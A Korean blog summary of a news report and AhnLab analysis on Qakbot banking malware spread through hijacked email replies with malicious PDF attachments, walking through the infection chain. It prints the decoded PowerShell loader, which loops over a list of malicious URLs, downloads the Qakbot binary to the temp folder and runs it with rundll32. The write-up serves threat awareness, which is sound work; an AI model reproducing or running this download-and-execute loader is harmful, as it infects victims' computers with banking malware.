기사 요약 :
뱅킹형 악성코드인 칵봇(Qakbot)이 정상 메일을 가로챈 후에 기존 이메일을 회신 및 전달하는 방식으로 악성 PDF 파일을 첨부해서 유포가 진행되고 있다.
[ 악성코드 정보 ]
악성코드 정보 : 원문에 대해 점부파일과 함께 전달되어 첨부파일 열람을 유도.
- 원본 이메일 오간 시점 : 2018년~2022년. 최근 시점은 아님.
- 첨부파일 명 : UT.PDF, RA.PDF, NM.PDF 등과 같은 랜덤문자 형태
- 동작 방식 :
1) 해당 PDF 파일을 실행하면 Microsoft Azure 로고와 함께 OPEN 버튼을 클릭 유도
2) Open 버튼 클릭하면 악성 URL 연결, 암호화된 압축 ZIP 파일 다운
3) 파일 비밀번호 : 본문에 기재된 Password : 755
4) 압축을 해제하면 WSF 파일이 있음
👉 해당 파일 확인하면 안티바이러스 제품 우회를 위해 더미 텍스트와 함께 난독화된 스크립트 코드 확인 가능.
5) WSF 파일을 실행함녀 파워쉘 프로세스를 통해 암호화된 데이터 커맨드를 실행.
👉 해당 파일 복호화하면 URL에서 Qakbot 바이너리를 TMP 경로에 undersluice.Calctuffs 파일명으로 다운로드 후 rundll32.exe 프로세스를 통해 실행.
- 파워쉘 코드 :
powershell.exe” -ENC “Start-Sleep -Seconds 2;
$Girnie = (“hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp,hxxps://qassimnews[.]com/yweNej/kQBDu,hxxps://stealingexcellence[.]com/rVR9r/yahxNk,hxxps://medano355condominio[.]com/Tt7l/OwZd8xdlWjil,hxxps://choicefaz.com[.]br/w1W2/4gPNeUm0J,hxxps://t-lows[.]com/ggAJ2m/kXpW59tm,hxxps://seicas[.]com/KvtM0/Uj3atvfT4E,hxxps://farmfutures[.]in/tlUtBc/IYj0K1,hxxps://alzheimersdigest[.]net/ZKpva/55C63K,hxxps://antoinettegabriel[.]com/YuUE/RQwyJWR2jjc”).split(“,”);
foreach ($reflexional in $Girnie) {
try {wget $reflexional -TimeoutSec 17 -O $env:TEMP\undersluice.Calctuffs;
if ((Get-Item $env:TEMP\undersluice.Calctuffs).length -ge 100000) {
start rundll32 $env:TEMP\\undersluice.Calctuffs,X555;break;}
} catch {Start-Sleep -Seconds 2;}
}6) 해당 커맨드가 실행되면 악성 URL에서 Qakbot 바이너리 유포
김영명 기자, 뱅킹 악성코드 칵봇, 이메일 하이재킹 통해 국내 유포중, 보안뉴스, https://www.boannews.com/media/view.asp?idx=116995&page=2&kind=1
뱅킹 악성코드 칵봇, 이메일 하이재킹 통해 국내 유포중
칵봇(Qakbot) 악성코드가 기존의 이메일을 회신 및 전달하는 형태로 악성 PDF 파일을 첨부해 유포되는 정황이 확인됐다. 뱅킹형 악성코드로 알려진 칵봇은 다양한 매개체를 통해 지속해서 유포되
www.boannews.com
안랩 블로그(ASEC), 이메일 하이재킹을 통해 Qakbot 악성코드 국내 유포 중, https://asec.ahnlab.com/ko/51109/
이메일 하이재킹을 통해 Qakbot 악성코드 국내 유포 중 - ASEC BLOG
AhnLab Security Emergency response Center(ASEC)에서는 기존의 이메일을 이용(회신/전달)하는 형태로 악성 PDF파일을 첨부하여 Qakbot 악성코드가 유포되는 정황을 확인하였다.뱅킹형 악성코드로 알려진 Qakbot
asec.ahnlab.com
